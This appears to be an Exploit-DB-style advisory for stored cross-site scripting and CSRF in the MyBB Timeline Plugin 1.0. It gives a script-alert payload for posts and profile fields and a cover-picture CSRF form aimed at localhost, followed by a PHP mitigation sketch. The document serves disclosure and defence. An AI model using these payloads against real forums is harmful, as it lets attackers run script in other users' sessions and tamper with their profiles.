Vendor: MyBB Timeline Plugin
By: 0xB9
CVSS: 7.5 (HIGH)
Cross-Site Scripting / CSRF
CWE: 79
Product Name: MyBB Timeline Plugin
Affected Version From: 1.0
Affected Version To: 1.0
Patch Exists: NO
Related CWE: N/A
CPE: a:mybb:mybb_timeline_plugin:1.0
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows 10
2021

MyBB Timeline Plugin 1.0 – Cross-Site Scripting / CSRF

MyBB Timeline replaces the default MyBB user profile. This introduces cross-site scripting on user profiles and a CSRF that allows the user's timeline banner/image to be changed.

Proof of Concept:
XSS via Thread/Post: Make a new thread or reply to an existing thread and input a payload in either the thread title or the main post itself.
XSS via Location/Bio: Go to User CP -> Edit Profile and input a payload in the Location/Bio.
CSRF: A form with an input field for the image URL and a hidden input field for the action.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in the application.
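
A sketch of the two fixes this advisory calls for, as an added example that is not the plugin's code: escape user-controlled profile values on output, and require a per-session token on the cover-picture change. The field names coverpic and do_coverpic come from the PoC form on this page; the helper names, the csrf field and the session array layout are assumptions made for illustration.

```php
<?php
declare(strict_types=1);
// Added example: NOT the plugin's code; helper names are hypothetical.

// Escape every user-controlled value (thread title, post, location, bio,
// cover image URL) at the point where it is written into the profile HTML.
function e(string $s): string {
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Per-session anti-CSRF token; the real form carries it as a hidden field.
function csrf_token(array &$session): string {
    if (empty($session['csrf'])) {
        $session['csrf'] = bin2hex(random_bytes(32));
    }
    return $session['csrf'];
}

// Accept only absolute http(s) URLs for the cover image.
function valid_cover_url(string $url): bool {
    $scheme = strtolower((string) parse_url($url, PHP_URL_SCHEME));
    return filter_var($url, FILTER_VALIDATE_URL) !== false
        && in_array($scheme, ['http', 'https'], true);
}

// Cover-picture change: POST only, token compared in constant time.
function handle_coverpic(string $method, array $post, array &$session): string {
    if ($method !== 'POST' || ($post['do_coverpic'] ?? '') !== 'change') {
        return 'rejected: not a POST change request';
    }
    $sent = $post['csrf'] ?? '';
    if (!is_string($sent) || !hash_equals(csrf_token($session), $sent)) {
        return 'rejected: bad CSRF token';
    }
    $url = $post['coverpic'] ?? '';
    if (!is_string($url) || !valid_cover_url($url)) {
        return 'rejected: invalid image URL';
    }
    $session['coverpic'] = $url;
    return 'ok';
}

// Constructed sample requests (not captured traffic).
$session = [];
$token = csrf_token($session);
$req = ['do_coverpic' => 'change', 'coverpic' => 'http://example.com/a.png'];
echo e("<script>alert('XSS')</script>"), "\n";                    // rendered inert
echo handle_coverpic('POST', $req, $session), "\n";               // cross-site: no token
echo handle_coverpic('POST', $req + ['csrf' => $token], $session), "\n";
echo handle_coverpic('POST', ['coverpic' => 'ftp://example.com/a.png'] + $req + ['csrf' => $token], $session), "\n";
```

In an actual MyBB plugin these roles are filled by the core's own helpers: htmlspecialchars_uni() for output escaping and the post key ($mybb->post_code, checked with verify_post_check()) for the CSRF token.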

Exploit-DB raw data:

# Exploit Title: MyBB Timeline Plugin 1.0 - Cross-Site Scripting / CSRF
# Date: 1/21/2021
# Author: 0xB9
# Software Link: https://community.mybb.com/mods.php?action=view&pid=1428
# Version: 1.0
# Tested on: Windows 10

1. Description:
MyBB Timeline replaces the default MyBB user profile. This introduces cross-site scripting on user profiles & a CSRF that allows for the user's timeline banner/image to be changed.
 

2. Proof of Concept:

~ XSS via Thread/Post ~
- Make a new thread or reply to an existing thread
- Input a payload in either the thread title or main post itself   <script>alert('XSS')</script>
Payload will execute when visiting your profile.

~ XSS via Location/Bio ~
- Go to User CP -> Edit Profile
- Input a payload in the Location/Bio   <script>alert('XSS')</script>
Payload will execute when visiting your profile.

~ CSRF ~
<form class="coverpicForm" action="http://localhost/mybb/timeline.php?action=profile&uid=1" style="display: block;">
	<input type="text" name="coverpic" placeholder="Add Image URL" required="">
	<input type="hidden" name="do_coverpic" value="change">
	<input type="submit" value="Change">
</form>